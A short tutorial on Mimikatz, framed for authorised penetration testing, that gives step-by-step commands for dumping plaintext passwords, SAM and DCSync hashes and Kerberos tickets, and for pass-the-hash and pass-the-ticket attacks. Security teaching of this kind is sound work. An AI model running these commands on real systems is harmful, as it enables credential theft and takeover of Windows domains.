Mimikatz is a powerful post-exploitation tool designed to extract plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory. It is widely used by penetration testers and security professionals to assess system vulnerabilities. This guide provides a step-by-step approach to installing and using Mimikatz for ethical security testing.
Warning: Unauthorized use of Mimikatz is illegal. Ensure you have permission before using it in any environment.
Before installing Mimikatz, make sure you have the following:
Mimikatz is an open-source tool available on GitHub. To download it:
Alternatively, you can clone the repository using Git:
git clone https://github.com/gentilkiwi/mimikatz.git
Since Mimikatz requires administrative privileges, follow these steps to run it:
cd path\to\mimikatz\x64
mimikatz.exe
You should now see the mimikatz # prompt.
Before extracting credentials, verify that you have sufficient privileges:
privilege::debug
If successful, you should see: Privilege '20' OK
To dump plaintext passwords from memory, use:
sekurlsa::logonpasswords
This will display the username, domain, and password of each logon session in plaintext where one is still held in memory.
NTLM hashes can be used for pass-the-hash attacks. To extract them, run:
lsadump::sam
Or, to pull account hashes from a domain controller through directory replication (DCSync):
lsadump::dcsync /domain:targetdomain.com /user:Administrator
To retrieve Kerberos tickets from the system:
sekurlsa::tickets /export
This exports .kirbi files, which can be used in pass-the-ticket attacks.
To authenticate with an NTLM hash instead of a password:
sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>